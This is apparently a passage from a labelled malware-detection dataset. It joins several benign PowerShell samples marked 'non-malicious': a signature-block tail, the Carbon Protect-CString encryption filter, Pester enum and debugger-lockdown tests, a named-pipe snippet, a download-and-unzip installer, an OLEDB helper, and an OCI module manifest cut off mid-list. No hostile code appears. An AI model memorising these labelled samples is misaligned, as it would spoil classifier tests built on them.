Yqlz617e76ga7SY0w71+QP165CPdzUY36et2Sm4pvspEK8hllq3IYcyX0v897+X9 # YeecM1Pb1jCCB3EwggVZoAMCAQICEzMAAAAVxedrngKbSZkAAAAAABUwDQYJKoZI # hvcNAQELBQAwgYgxCzAJBgNVBAYTAlVTMRMwEQYDVQQIEwpXYXNoaW5ndG9uMRAw # DgYDVQQHEwdSZWRtb25kMR4wHAYDVQQKExVNaWNyb3NvZnQgQ29ycG9yYXRpb24x # MjAwBgNVBAMTKU1pY3Jvc29mdCBSb290IENlcnRpZmljYXRlIEF1dGhvcml0eSAy # MDEwMB4XDTIxMDkzMDE4MjIyNVoXDTMwMDkzMDE4MzIyNVowfDELMAkGA1UEBhMC # VVMxEzARBgNVBAgTCldhc2hpbmd0b24xEDAOBgNVBAcTB1JlZG1vbmQxHjAcBgNV # BAoTFU1pY3Jvc29mdCBDb3Jwb3JhdGlvbjEmMCQGA1UEAxMdTWljcm9zb2Z0IFRp # bWUtU3RhbXAgUENBIDIwMTAwggIiMA0GCSqGSIb3DQEBAQUAA4ICDwAwggIKAoIC # AQDk4aZM57RyIQt5osvXJHm9DtWC0/3unAcH0qlsTnXIyjVX9gF/bErg4r25Phdg # M/9cT8dm95VTcVrifkpa/rg2Z4VGIwy1jRPPdzLAEBjoYH1qUoNEt6aORmsHFPPF # dvWGUNzBRMhxXFExN6AKOG6N7dcP2CZTfDlhAnrEqv1yaa8dq6z2Nr41JmTamDu6 # GnszrYBbfowQHJ1S/rboYiXcag/PXfT+jlPP1uyFVk3v3byNpOORj7I5LFGc6XBp # Dco2LXCOMcg1KL3jtIckw+DJj361VI/c+gVVmG1oO5pGve2krnopN6zL64NF50Zu # yjLVwIYwXE8s4mKyzbnijYjklqwBSru+cakXW2dg3viSkR4dPf0gz3N9QZpGdc3E # XzTdEonW/aUgfX782Z5F37ZyL9t9X4C626p+Nuw2TPYrbqgSUei/BQOj0XOmTTd0 # lBw0gg/wEPK3Rxjtp+iZfD9M269ewvPV2HM9Q07BMzlMjgK8QmguEOqEUUbi0b1q # GFphAXPKZ6Je1yh2AuIzGHLXpyDwwvoSCtdjbwzJNmSLW6CmgyFdXzB0kZSU2LlQ # +QuJYfM2BjUYhEfb3BvR/bLUHMVr9lxSUV0S2yW6r1AFemzFER1y7435UsSFF5PA # PBXbGjfHCBUYP3irRbb1Hode2o+eFnJpxq57t7c+auIurQIDAQABo4IB3TCCAdkw # EgYJKwYBBAGCNxUBBAUCAwEAATAjBgkrBgEEAYI3FQIEFgQUKqdS/mTEmr6CkTxG # NSnPEP8vBO4wHQYDVR0OBBYEFJ+nFV0AXmJdg/Tl0mWnG1M1GelyMFwGA1UdIARV # MFMwUQYMKwYBBAGCN0yDfQEBMEEwPwYIKwYBBQUHAgEWM2h0dHA6Ly93d3cubWlj # cm9zb2Z0LmNvbS9wa2lvcHMvRG9jcy9SZXBvc2l0b3J5Lmh0bTATBgNVHSUEDDAK # BggrBgEFBQcDCDAZBgkrBgEEAYI3FAIEDB4KAFMAdQBiAEMAQTALBgNVHQ8EBAMC # AYYwDwYDVR0TAQH/BAUwAwEB/zAfBgNVHSMEGDAWgBTV9lbLj+iiXGJo0T2UkFvX # zpoYxDBWBgNVHR8ETzBNMEugSaBHhkVodHRwOi8vY3JsLm1pY3Jvc29mdC5jb20v # cGtpL2NybC9wcm9kdWN0cy9NaWNSb29DZXJBdXRfMjAxMC0wNi0yMy5jcmwwWgYI # KwYBBQUHAQEETjBMMEoGCCsGAQUFBzAChj5odHRwOi8vd3d3Lm1pY3Jvc29mdC5j # b20vcGtpL2NlcnRzL01pY1Jvb0NlckF1dF8yMDEwLTA2LTIzLmNydDANBgkqhkiG # 9w0BAQsFAAOCAgEAnVV9/Cqt4SwfZwExJFvhnnJL/Klv6lwUtj5OR2R4sQaTlz0x # M7U518JxNj/aZGx80HU5bbsPMeTCj/ts0aGUGCLu6WZnOlNN3Zi6th542DYunKmC # VgADsAW+iehp4LoJ7nvfam++Kctu2D9IdQHZGN5tggz1bSNU5HhTdSRXud2f8449 # xvNo32X2pFaq95W2KFUn0CS9QKC/GbYSEhFdPSfgQJY4rPf5KYnDvBewVIVCs/wM # nosZiefwC2qBwoEZQhlSdYo2wh3DYXMuLGt7bj8sCXgU6ZGyqVvfSaN0DLzskYDS # PeZKPmY7T7uG+jIa2Zb0j/aRAfbOxnT99kxybxCrdTDFNLB62FD+CljdQDzHVG2d # Y3RILLFORy3BFARxv2T5JL5zbcqOCb2zAVdJVGTZc9d/HltEAY5aGZFrDZ+kKNxn # GSgkujhLmm77IVRrakURR6nxt67I6IleT53S0Ex2tVdUCbFpAUR+fKFhbHP+Crvs # QWY9af3LwUFJfn6Tvsv4O+S3Fb+0zj6lMVGEvL8CwYKiexcdFYmNcP7ntdAoGokL # jzbaukz5m/8K6TT4JDVnK+ANuOaMmdbhIurwJ0I9JZTmdHRbatGePu1+oDEzfbzL # 6Xu/OHBE0ZDxyKs6ijoIYn/ZcGNTTY3ugm2lBRDBcQZqELQdVTNYs6FwZvKhggNN # MIICNQIBATCB+aGB0aSBzjCByzELMAkGA1UEBhMCVVMxEzARBgNVBAgTCldhc2hp # bmd0b24xEDAOBgNVBAcTB1JlZG1vbmQxHjAcBgNVBAoTFU1pY3Jvc29mdCBDb3Jw # b3JhdGlvbjElMCMGA1UECxMcTWljcm9zb2Z0IEFtZXJpY2EgT3BlcmF0aW9uczEn # MCUGA1UECxMeblNoaWVsZCBUU1MgRVNOOkYwMDItMDVFMC1EOTQ3MSUwIwYDVQQD # ExxNaWNyb3NvZnQgVGltZS1TdGFtcCBTZXJ2aWNloiMKAQEwBwYFKw4DAhoDFQBr # i943cFLH2TfQEfB05SLICg74CKCBgzCBgKR+MHwxCzAJBgNVBAYTAlVTMRMwEQYD # VQQIEwpXYXNoaW5ndG9uMRAwDgYDVQQHEwdSZWRtb25kMR4wHAYDVQQKExVNaWNy # b3NvZnQgQ29ycG9yYXRpb24xJjAkBgNVBAMTHU1pY3Jvc29mdCBUaW1lLVN0YW1w # IFBDQSAyMDEwMA0GCSqGSIb3DQEBCwUAAgUA6hRbQDAiGA8yMDI0MDYxMjE3Mzcw # NFoYDzIwMjQwNjEzMTczNzA0WjB0MDoGCisGAQQBhFkKBAExLDAqMAoCBQDqFFtA # AgEAMAcCAQACAgnHMAcCAQACAhQ2MAoCBQDqFazAAgEAMDYGCisGAQQBhFkKBAIx # KDAmMAwGCisGAQQBhFkKAwKgCjAIAgEAAgMHoSChCjAIAgEAAgMBhqAwDQYJKoZI # hvcNAQELBQADggEBAJvcRS7um6Ez5BBk0dXFSlYl2wfjoX3S3T4HLU05LIIMK/U7 # JGOch8nqwgYQPOBy2AgeOcLsS8JG+tXqby+r2ATPnvig/ZvzaN0gnK5tGBasHPoc # TkKHB9cOvx/FJZ3X46mP+3c6zV7za/3/Bn+adJn//8wJ2m4ctdrBD5REUxfGZovd # DDyDUOt9LeAY1ulZVd66cdvtNBQcjmuswWl+RTlQ7NQMPx7YTniHqtpi51AR8rHm # t4qQkA/QX1W6X0s/Lzr/ufCiMQ0uZR1lvo7nVFrk6y9n5pAoSITblvRqh9h7sE5s # Lf29MUXgzF5BmC3rEx68ZQKk2RRKqIL2LdW5jQ0xggQNMIIECQIBATCBkzB8MQsw # CQYDVQQGEwJVUzETMBEGA1UECBMKV2FzaGluZ3RvbjEQMA4GA1UEBxMHUmVkbW9u # ZDEeMBwGA1UEChMVTWljcm9zb2Z0IENvcnBvcmF0aW9uMSYwJAYDVQQDEx1NaWNy # b3NvZnQgVGltZS1TdGFtcCBQQ0EgMjAxMAITMwAAAfI+MtdkrHCRlAABAAAB8jAN # BglghkgBZQMEAgEFAKCCAUowGgYJKoZIhvcNAQkDMQ0GCyqGSIb3DQEJEAEEMC8G # CSqGSIb3DQEJBDEiBCAs1jKPlnPMPAg9r/DRGB+FJ9TkopkqIAQYnf3Y+gHSmDCB # +gYLKoZIhvcNAQkQAi8xgeowgecwgeQwgb0EIPjaPh0uMVJc04+Y4Ru5BUUbHE4s # uZ6nRHSUu0XXSkNEMIGYMIGApH4wfDELMAkGA1UEBhMCVVMxEzARBgNVBAgTCldh # c2hpbmd0b24xEDAOBgNVBAcTB1JlZG1vbmQxHjAcBgNVBAoTFU1pY3Jvc29mdCBD # b3Jwb3JhdGlvbjEmMCQGA1UEAxMdTWljcm9zb2Z0IFRpbWUtU3RhbXAgUENBIDIw # MTACEzMAAAHyPjLXZKxwkZQAAQAAAfIwIgQgg5FotLHecbCbi6cUZY/oaPwhtjA9 # z6nJCdeXLrd/R7IwDQYJKoZIhvcNAQELBQAEggIAoF109NU6drvApwjzF44Pzrir # 0YNcMczEqV+4Z7fKt4Lwv1zQsU5XBuTWK8HjDC90PNFqMehxtIWqMWlK84GVWbDN # Pfoal61wmkOy4k9+L2MJA1sjr66A2i2x6aQxa3WBmLdHvlf5vkWIQz4QUFjv/pOR # e057nU1Gk5sx/6R+byh5NrGZtGUZ5Wli8LyuA5U+cXXzlsXc4pMJqBpE9x5+kqA1 # QlwyZTqv4ngipLImrbc2BTds0xs/6YBecvK+hmxeb2QFcaIdCw49hu2IZpNjjwBS # Ge46eI3BtCkV5VIzxD3K5z5ZrBDJjPkGunKIOMknBYyTGUmddy7aPKEJDXD+u4wk # l3oJ2Yhbw20f3FO6Km+Ks9/CnjvVPafjdzi7LofC90tz8Eo7HVHqD02EqhZuBv12 # fCKFFwRa4JNnZDpg0cgNI3BY3dJgndEuUbWJgkmqvQWTDCfwGgecs9R4teWSi6oh # 2uR9ymArIF5MQzu7+pa9va+O88uYBxDS5Zle4pWgLANTNXqrPBBm34VBNuq078/F # eDrkISOehf1wiMsTefj1hwfNpvRrTdhDhm8IqHKe5xj9O/ciFpbgnQmvwYICf8YF # xK5v9wB6uRCKibKbWVxCm4NJW63tbgDQc4ezk2WRg1cG1kK8YSpQs2VJn5msEL+l # XM6CupATs2gBy8eJzTw= # SIG # End signature block
combined_dataset/train/non-malicious/1266.ps1
1266.ps1
filter Protect-CString { [CmdletBinding()] param( [Parameter(Mandatory = $true, Position=0, ValueFromPipeline = $true)] [object] $String, [Parameter(Mandatory=$true,ParameterSetName='DPAPICurrentUser')] [Switch] $ForUser, [Parameter(Mandatory=$true,ParameterSetName='DPAPILocalMachine')] [Switch] $ForComputer, [Parameter(Mandatory=$true,ParameterSetName='DPAPIForUser')] [Management.Automation.PSCredential] $Credential, [Parameter(Mandatory=$true,ParameterSetName='RSAByCertificate')] [Security.Cryptography.X509Certificates.X509Certificate2] $Certificate, [Parameter(Mandatory=$true,ParameterSetName='RSAByThumbprint')] [string] $Thumbprint, [Parameter(Mandatory=$true,ParameterSetName='RSAByPath')] [string] $PublicKeyPath, [Parameter(ParameterSetName='RSAByCertificate')] [Parameter(ParameterSetName='RSAByThumbprint')] [Parameter(ParameterSetName='RSAByPath')] [Switch] $UseDirectEncryptionPadding, [Parameter(Mandatory=$true,ParameterSetName='Symmetric')] [object] $Key ) Set-StrictMode -Version 'Latest' Use-CallerPreference -Cmdlet $PSCmdlet -Session $ExecutionContext.SessionState Add-Type -AssemblyName 'System.Security' if( $String -is [System.Security.SecureString] ) { $stringBytes = [Carbon.Security.SecureStringConverter]::ToBytes($String) } else { $stringBytes = [Text.Encoding]::UTF8.GetBytes( $String.ToString() ) } try { if( $PSCmdlet.ParameterSetName -like 'DPAPI*' ) { if( $PSCmdlet.ParameterSetName -eq 'DPAPIForUser' ) { $protectStringPath = Join-Path -Path $CarbonBinDir -ChildPath 'Protect-String.ps1' -Resolve $encodedString = Protect-CString -String $String -ForComputer $argumentList = '-ProtectedString {0}' -f $encodedString Invoke-CPowerShell -ExecutionPolicy 'ByPass' -NonInteractive -FilePath $protectStringPath -ArgumentList $argumentList -Credential $Credential | Select-Object -First 1 return } else { $scope = [Security.Cryptography.DataProtectionScope]::CurrentUser if( $PSCmdlet.ParameterSetName -eq 'DPAPILocalMachine' ) { $scope = [Security.Cryptography.DataProtectionScope]::LocalMachine } $encryptedBytes = [Security.Cryptography.ProtectedData]::Protect( $stringBytes, $null, $scope ) } } elseif( $PSCmdlet.ParameterSetName -like 'RSA*' ) { if( $PSCmdlet.ParameterSetName -eq 'RSAByThumbprint' ) { $Certificate = Get-ChildItem -Path ('cert:\*\*\{0}' -f $Thumbprint) -Recurse | Select-Object -First 1 if( -not $Certificate ) { Write-Error ('Certificate with thumbprint ''{0}'' not found.' -f $Thumbprint) return } } elseif( $PSCmdlet.ParameterSetName -eq 'RSAByPath' ) { $Certificate = Get-CCertificate -Path $PublicKeyPath if( -not $Certificate ) { return } } $rsaKey = $Certificate.PublicKey.Key if( $rsaKey -isnot ([Security.Cryptography.RSACryptoServiceProvider]) ) { Write-Error ('Certificate ''{0}'' (''{1}'') is not an RSA key. Found a public key of type ''{2}'', but expected type ''{3}''.' -f $Certificate.Subject,$Certificate.Thumbprint,$rsaKey.GetType().FullName,[Security.Cryptography.RSACryptoServiceProvider].FullName) return } try { $encryptedBytes = $rsaKey.Encrypt( $stringBytes, (-not $UseDirectEncryptionPadding) ) } catch { if( $_.Exception.Message -match 'Bad Length\.' -or $_.Exception.Message -match 'The parameter is incorrect\.') { [int]$maxLengthGuess = ($rsaKey.KeySize - (2 * 160 - 2)) / 8 Write-Error -Message ('Failed to encrypt. String is longer than maximum length allowed by RSA and your key size, which is {0} bits. We estimate the maximum string size you can encrypt with certificate ''{1}'' ({2}) is {3} bytes. You may still get errors when you attempt to decrypt a string within a few bytes of this estimated maximum.' -f $rsaKey.KeySize,$Certificate.Subject,$Certificate.Thumbprint,$maxLengthGuess) return } else { Write-Error -Exception $_.Exception return } } } elseif( $PSCmdlet.ParameterSetName -eq 'Symmetric' ) { $Key = ConvertTo-Key -InputObject $Key -From 'Protect-CString' if( -not $Key ) { return } $aes = New-Object 'Security.Cryptography.AesCryptoServiceProvider' try { $aes.Padding = [Security.Cryptography.PaddingMode]::PKCS7 $aes.KeySize = $Key.Length * 8 $aes.Key = $Key $memoryStream = New-Object 'IO.MemoryStream' try { $cryptoStream = New-Object 'Security.Cryptography.CryptoStream' $memoryStream,$aes.CreateEncryptor(),([Security.Cryptography.CryptoStreamMode]::Write) try { $cryptoStream.Write($stringBytes,0,$stringBytes.Length) } finally { $cryptoStream.Dispose() } $encryptedBytes = Invoke-Command -ScriptBlock { $aes.IV $memoryStream.ToArray() } } finally { $memoryStream.Dispose() } } finally { $aes.Dispose() } } return [Convert]::ToBase64String( $encryptedBytes ) } finally { $stringBytes.Clear() } }
combined_dataset/train/non-malicious/2076.ps1
2076.ps1
Describe 'enums' -Tags "CI" { Context 'basic enums' { enum E1 { e0 e1 e2 } It "has correct value 0" { [E1]::e0 | Should -Be ([E1]0) } It "has correct value 1" { [E1]::e1 | Should -Be ([E1]1) } It "has correct value 2" { [E1]::e2 | Should -Be ([E1]2) } It "cast from string" { [E1]::e1 | Should -Be 'e1' } It "cast to string" { 'e2' | Should -Be ([E1]::e2) } } Context 'Basic enum with initial value' { enum E2 { e0 e1 = 5 e2 } It "has correct value 0" { [E2]::e0 | Should -Be ([E2]0) } It "has correct value 5" { [E2]::e1 | Should -Be ([E2]5) } It "has correct value 6" { [E2]::e2 | Should -Be ([E2]6) } It "cast from string" { [E2]::e1 | Should -Be 'e1' } It "cast to string" { 'e2' | Should -Be ([E2]::e2) } } Context 'Basic enum with initial value expression' { enum E3 { e0 e1 = 5 e2 = [int]::MaxValue e3 = 1 } It "has correct value 0" { [E3]::e0 | Should -Be ([E3]0) } It "has correct value 5" { [E3]::e1 | Should -Be ([E3]5) } It "has correct value [int]::MaxValue" { [E3]::e2 | Should -Be ([E3]([int]::MaxValue)) } It "has correct value 1" { [E3]::e3 | Should -Be ([E3]1) } It "cast from string" { [E3]::e2 | Should -Be 'e2' } It "cast to string" { 'e3' | Should -Be ([E3]::e3) } } Context 'Enum with complicated initial value' { enum E4 { e0 = [E5]::e0 + 2 } enum E5 { e0 = [E6]::e0 + 2 } enum E6 { e0 =38 } It 'E4 has correct value' { [E4]::e0 | Should -Be ([E4]42) } It 'E5 has correct value' { [E5]::e0 | Should -Be ([E5]40) } It 'E6 has correct value' { [E6]::e0 | Should -Be ([E6]38) } } Context 'Enum with non-default underlying type' { enum EX1 : byte { A;B;C;D } enum EX2 : sbyte { A;B;C;D } enum EX3 : short { A;B;C;D } enum EX4 : ushort { A;B;C;D } enum EX5 : int { A;B;C;D } enum EX6 : uint { A;B;C;D } enum EX7 : long { A;B;C;D } enum EX8 : ulong { A;B;C;D } It 'EX1 has the specified underlying type' { [Enum]::GetUnderlyingType([EX1]) | Should -Be ([byte]) } It 'EX2 has the specified underlying type' { [Enum]::GetUnderlyingType([EX2]) | Should -Be ([sbyte]) } It 'EX3 has the specified underlying type' { [Enum]::GetUnderlyingType([EX3]) | Should -Be ([short]) } It 'EX4 has the specified underlying type' { [Enum]::GetUnderlyingType([EX4]) | Should -Be ([ushort]) } It 'EX5 has the specified underlying type' { [Enum]::GetUnderlyingType([EX5]) | Should -Be ([int]) } It 'EX6 has the specified underlying type' { [Enum]::GetUnderlyingType([EX6]) | Should -Be ([uint]) } It 'EX7 has the specified underlying type' { [Enum]::GetUnderlyingType([EX7]) | Should -Be ([long]) } It 'EX8 has the specified underlying type' { [Enum]::GetUnderlyingType([EX8]) | Should -Be ([ulong]) } } Context 'Enum with negative user-specified values' { enum V1 { A = -4 B = [int]::MinValue C } It 'Negative values are correctly assigned to members' { [V1]::A.value__ | Should -Be -4 [V1]::B.value__ | Should -Be -2147483648 [V1]::C.value__ | Should -Be -2147483647 } } } Describe 'Basic enum errors' -Tags "CI" { ShouldBeParseError 'enum' MissingNameAfterKeyword 4 ShouldBeParseError 'enum foo' MissingTypeBody 8 ShouldBeParseError 'enum foo {' MissingEndCurlyBrace 10 ShouldBeParseError 'enum foo { x = }' ExpectedValueExpression 14 ShouldBeParseError 'enum foo { x =' ExpectedValueExpression,MissingEndCurlyBrace 14,10 ShouldBeParseError 'enum foo {} enum foo {}' MemberAlreadyDefined 12 ShouldBeParseError 'enum foo { x; x }' MemberAlreadyDefined 14 -SkipAndCheckRuntimeError ShouldBeParseError 'enum foo { X; x }' MemberAlreadyDefined 14 -SkipAndCheckRuntimeError ShouldBeParseError 'enum foo1 { x = [foo2]::x } enum foo2 { x = [foo1]::x }' CycleInEnumInitializers,CycleInEnumInitializers 0,28 -SkipAndCheckRuntimeError ShouldBeParseError 'enum foo { e = [int]::MaxValue; e2 }' EnumeratorValueOutOfBounds 33 -SkipAndCheckRuntimeError ShouldBeParseError 'enum foo { e = [int]::MaxValue + 1 }' EnumeratorValueOutOfBounds 15 -SkipAndCheckRuntimeError ShouldBeParseError 'enum foo : byte { e = -1 }' EnumeratorValueOutOfBounds 22 -SkipAndCheckRuntimeError ShouldBeParseError 'enum foo { e = $foo }' EnumeratorValueMustBeConstant 15 -SkipAndCheckRuntimeError ShouldBeParseError 'enum foo { e = "hello" }' CannotConvertValue 15 -SkipAndCheckRuntimeError ShouldBeParseError 'enum foo { a;b;c;' MissingEndCurlyBrace 10 ShouldBeParseError 'enum foo : string { a }' InvalidUnderlyingType 11 -SkipAndCheckRuntimeError }
combined_dataset/train/non-malicious/1769.ps1
1769.ps1
Import-Module HelpersSecurity try { $defaultParamValues = $PSDefaultParameterValues.Clone() $PSDefaultParameterValues["it:Skip"] = !$IsWindows Describe "Local script debugger is disabled in system lock down mode" -Tags 'CI','RequireAdminOnWindows' { BeforeAll { $debuggerTestTypeDef = @' using System; using System.Management.Automation; using System.Management.Automation.Runspaces; namespace TestRunner { public class DebuggerTester { private Runspace _runspace; public int DebuggerStopHitCount { private set; get; } public DebuggerTester(Runspace runspace) { if (runspace.Debugger == null) { throw new PSArgumentException("The provided runspace script debugger cannot be null for test."); } _runspace = runspace; _runspace.Debugger.DebuggerStop += (sender, args) => { DebuggerStopHitCount += 1; }; } } } '@ $script = @' "Hello" Wait-Debugger "Goodbye" '@ $scriptFilePath = Join-Path $TestDrive TScript.ps1 $script > $scriptFilePath Add-Type -TypeDefinition $debuggerTestTypeDef $TestCasesDisableDebugger = @( @{ testName = 'Verifies that Set-PSBreakpoint Line is disabled on locked down system' scriptText = 'Set-PSBreakpoint -Script {0} -Line 1' -f $scriptFilePath }, @{ testName = 'Verifies that Set-PSBreakpoint Statement is disabled on locked down system' scriptText = 'Set-PSBreakpoint -Script {0} -Line 1 -Column 1' -f $scriptFilePath }, @{ testName = 'Verifies that Set-PSBreakpoint Command is disabled on locked down system' scriptText = 'Set-PSBreakpoint -Command {0}' -f $scriptFilePath }, @{ testName = 'Verifies that Set-PSBreakpoint Variable is disabled on locked down system' scriptText = 'Set-PSBreakpoint -Variable HelloVar' } ) } AfterAll { if (($script:moduleDirectory -ne $null) -and (Test-Path $script:moduleDirectory)) { try { Remove-Item -Path $moduleDirectory -Recurse -Force -ErrorAction SilentlyContinue } catch { } } } It "<testName>" -TestCases $TestCasesDisableDebugger { param ($scriptText) try { Invoke-LanguageModeTestingSupportCmdlet -SetLockdownMode [powershell] $ps = [powershell]::Create([System.Management.Automation.RunspaceMode]::NewRunspace); $ps.AddScript($scriptText).Invoke() $expectedError = $ps.Streams.Error[0] } finally { Invoke-LanguageModeTestingSupportCmdlet -RevertLockdownMode -EnableFullLanguageMode if ($ps -ne $null) { $ps.Dispose() } } $expectedError.FullyQualifiedErrorId | Should Be 'NotSupported,Microsoft.PowerShell.Commands.SetPSBreakpointCommand' } It "Verifies that Wait-Debugger is disabled on locked down system" { try { Invoke-LanguageModeTestingSupportCmdlet -SetLockdownMode [runspace] $runspace = [runspacefactory]::CreateRunspace() $runspace.Open() $debuggerTester = [TestRunner.DebuggerTester]::new($runspace) [powershell] $ps = [powershell]::Create() $ps.Runspace = $runspace $null = $ps.AddScript('"Hello"; Wait-Debugger; "Goodbye"').Invoke() } finally { Invoke-LanguageModeTestingSupportCmdlet -RevertLockdownMode -EnableFullLanguageMode if ($runspace -ne $null) { $runspace.Dispose() } if ($ps -ne $null) { $ps.Dispose() } } $debuggerTester.DebuggerStopHitCount | Should Be 0 } } } finally { if ($null -ne $defaultParamValues) { $Global:PSDefaultParameterValues = $defaultParamValues } }
combined_dataset/train/non-malicious/New-NamedPipe.ps1
New-NamedPipe.ps1
# .NET 3.5 is required to use the System.IO.Pipes namespace [reflection.Assembly]::LoadWithPartialName("system.core") | Out-Null $pipeName = "pipename" $pipeDir = [System.IO.Pipes.PipeDirection]::InOut $pipe = New-Object system.IO.Pipes.NamedPipeServerStream( $pipeName, $pipeDir )
combined_dataset/train/non-malicious/615.ps1
615.ps1
param( [string]$Version, [string]$Path, [switch]$Force, $Update, [switch]$Uninstall ) $Configs = @{ Url = "http://download-codeplex.sec.s-msft.com/Download/Release?ProjectName=sharepointpowershell&DownloadId=807591&FileTime=130378986116670000&Build=20885" Path = "$((Get-Location).Path)\" } $Configs | ForEach-Object{ try{ $_.Result = $null if(-not $_.Path){$_.Path = $Path} $Config = $_ if(-not $Uninstall){ if($_.ConditionExclusion){ $_.ConditionExclusionResult = $(Invoke-Expression $Config.ConditionExclusion -ErrorAction SilentlyContinue) } if(($_.ConditionExclusionResult -eq $null) -or $Force){ $_.Downloads = $_.Url | ForEach-Object{ Get-File -Url $_ -Path (Join-Path $Config.Path "SharePointPowerShell.zip") } $_.Downloads | ForEach-Object{ & 7za x $(Join-Path $_.Path $_.Filename) -y | Out-Null } $_.Downloads | ForEach-Object{ Remove-Item $(Join-Path $_.Path $_.Filename) } if($Update){$_.Result = "AppUpdated";$_ }else{$_.Result = "AppInstalled";$_} }else{ $_.Result = "ConditionExclusion";$_ } }else{ $_.Result = "AppUninstalled";$_ } }catch{ $Config.Result = "Error";$Config } }
combined_dataset/train/non-malicious/Get-OLEDBData.ps1
Get-OLEDBData.ps1
########################################################################### # Get-OLEDBData # -------------------------------------------- # Description: This function is used to retrieve data via an OLEDB data # connection. # # Inputs: $connectstring - Connection String. # $sql - SQL statement to be executed to retrieve data. # # Usage: Get-OLEDBData <connction string> <SQL statement> # #Connection String for Excel 2007: #"Provider=Microsoft.ACE.OLEDB.12.0;Data Source=`"$filepath`";Extended Properties=`"Excel 12.0 Xml;HDR=YES`";" #Connection String for Excel 2003: #"Provider=Microsoft.Jet.OLEDB.4.0;Data Source=`"$filepath`";Extended Properties=`"Excel 8.0;HDR=Yes;IMEX=1`";" #Excel query #'select * from [sheet1$]' #Informix #"password=$password;User ID=$userName;Data Source=$dbName@$serverName;Persist Security Info=true;Provider=Ifxoledbc.2" #Oracle #"password=$password;User ID=$userName;Data Source=$serverName;Provider=OraOLEDB.Oracle" #SQL Server #"Server=$serverName;Trusted_connection=yes;database=$dbname;Provider=SQLNCLI;" ########################################################################### function Get-OLEDBData ($connectstring, $sql) { $OLEDBConn = New-Object System.Data.OleDb.OleDbConnection($connectstring) $OLEDBConn.open() $readcmd = New-Object system.Data.OleDb.OleDbCommand($sql,$OLEDBConn) $readcmd.CommandTimeout = '300' $da = New-Object system.Data.OleDb.OleDbDataAdapter($readcmd) $dt = New-Object system.Data.datatable [void]$da.fill($dt) $OLEDBConn.close() return $dt }
combined_dataset/train/non-malicious/sample_52_30.ps1
sample_52_30.ps1
# # Module manifest for module 'OCI.PSModules.Goldengate' # # Generated by: Oracle Cloud Infrastructure # # @{ # Script module or binary module file associated with this manifest. RootModule = 'assemblies/OCI.PSModules.Goldengate.dll' # Version number of this module. ModuleVersion = '79.0.0' # Supported PSEditions CompatiblePSEditions = 'Core' # ID used to uniquely identify this module GUID = '342128d9-559b-4b8b-9ce9-d9d50eaf7247' # Author of this module Author = 'Oracle Cloud Infrastructure' # Company or vendor of this module CompanyName = 'Oracle Corporation' # Copyright statement for this module Copyright = '(c) Oracle Cloud Infrastructure. All rights reserved.' # Description of the functionality provided by this module Description = 'This modules provides Cmdlets for OCI Goldengate Service' # Minimum version of the PowerShell engine required by this module PowerShellVersion = '6.0' # Name of the PowerShell host required by this module # PowerShellHostName = '' # Minimum version of the PowerShell host required by this module # PowerShellHostVersion = '' # Minimum version of Microsoft .NET Framework required by this module. This prerequisite is valid for the PowerShell Desktop edition only. # DotNetFrameworkVersion = '' # Minimum version of the common language runtime (CLR) required by this module. This prerequisite is valid for the PowerShell Desktop edition only. # ClrVersion = '' # Processor architecture (None, X86, Amd64) required by this module # ProcessorArchitecture = '' # Modules that must be imported into the global environment prior to importing this module RequiredModules = @(@{ModuleName = 'OCI.PSModules.Common'; GUID = 'b3061a0d-375b-4099-ae76-f92fb3cdcdae'; RequiredVersion = '79.0.0'; }) # Assemblies that must be loaded prior to importing this module RequiredAssemblies = 'assemblies/OCI.DotNetSDK.Goldengate.dll' # Script files (.ps1) that are run in the caller's environment prior to importing this module. # ScriptsToProcess = @() # Type files (.ps1xml) to be loaded when importing this module # TypesToProcess = @() # Format files (.ps1xml) to be loaded when importing this module # FormatsToProcess = @() # Modules to import as nested modules of the module specified in RootModule/ModuleToProcess # NestedModules = @() # Functions to export from this module, for best performance, do not use wildcards and do not delete the entry, use an empty array if there are no functions to export. FunctionsToExport = '*' # Cmdlets to export from this module, for best performance, do not use wildcards and do not delete the entry, use an empty array if there are no cmdlets to export. CmdletsToExport = 'Copy-OCIGoldengateDeploymentBackup', 'Export-OCIGoldengateDeploymentWallet', 'Get-OCIGoldengateCertificate', 'Get-OCIGoldengateCertificatesList', 'Get-OCIGoldengateConnection', 'Get-OCIGoldengateConnectionAssignment', 'Get-OCIGoldengateConnectionAssignmentsList', 'Get-OCIGoldengateConnectionsList', 'Get-OCIGoldengateDatabaseRegistration', 'Get-OCIGoldengateDatabaseRegistrationsList', 'Get-OCIGoldengateDeployment', 'Get-OCIGoldengateDeploymentBackup', 'Get-OCIGoldengateDeploymentBackupsList', 'Get-OCIGoldengateDeploymentsList', 'Get-OCIGoldengateDeploymentTypesList', 'Get-OCIGoldengateDeploymentUpgrade', 'Get-OCIGoldengateDeploymentUpgradesList', 'Get-OCIGoldengateDeploymentVersionsList', 'Get-OCIGoldengateDeploymentWalletsOperationsList', 'Get-OCIGoldengateMessagesList', 'Get-OCIGoldengateTrailFilesList', 'Get-OCIGoldengateTrailSequencesList', 'Get-OCIGoldengateWorkRequest', 'Get-OCIGoldengateWorkRequestErrorsList', 'Get-OCIGoldengateWorkRequestLogsList', 'Get-OCIGoldengateWorkRequestsList', 'Import-OCIGoldengateDeploymentWallet', 'Invoke-OCIGoldengateCollectDeploymentDiagnostic', 'Invoke-OCIGoldengateDeploymentWalletExists', 'Invoke-OCIGoldengateRescheduleDeploymentUpgrade', 'Invoke-OCIGoldengateRollbackDeploymentUpgrade', 'Invoke-OCIGoldengateSnoozeDeploymentUpgrade', 'Invoke-OCIGoldengateTestConnectionAssignment', 'Invoke-OCIGoldengateUpgradeDeployment', 'Invoke-OCIGoldengateUpgradeDeploymentUpgrade', 'Move-OCIGoldengateConnectionCompartment', 'Move-OCIGoldengateDatabaseRegistrationCompartment', 'Move-OCIGoldengateDeploymentBackupCompartment', 'Move-OCIGoldengateDeploymentCompartment', 'New-OCIGoldengateCertificate', 'New-OCIGoldengateConnection', 'New-OCIGoldengateConnectionAssignment', 'New-OCIGoldengateDatabaseRegistration', 'New-OCIGoldengateDeployment', 'New-OCIGoldengateDeploymentBackup', 'Remove-OCIGoldengateCertificate', 'Remove-OCIGoldengateConnection', 'Remove-OCIGoldengateConnectionAssignment', 'Remove-OCIGoldengateDatabaseRegistration', 'Remove-OCIGoldengateDeployment', 'Remove-OCIGoldengateDeploymentBackup', 'Restore-OCIGoldengateDeployment', 'Start-OCIGoldengateDeployment', 'Stop-OCIGoldengateDeployment', 'Stop-OCIGoldengateDeploymentBackup', 'Stop-OCIGoldengateDeploymentUpgrade', 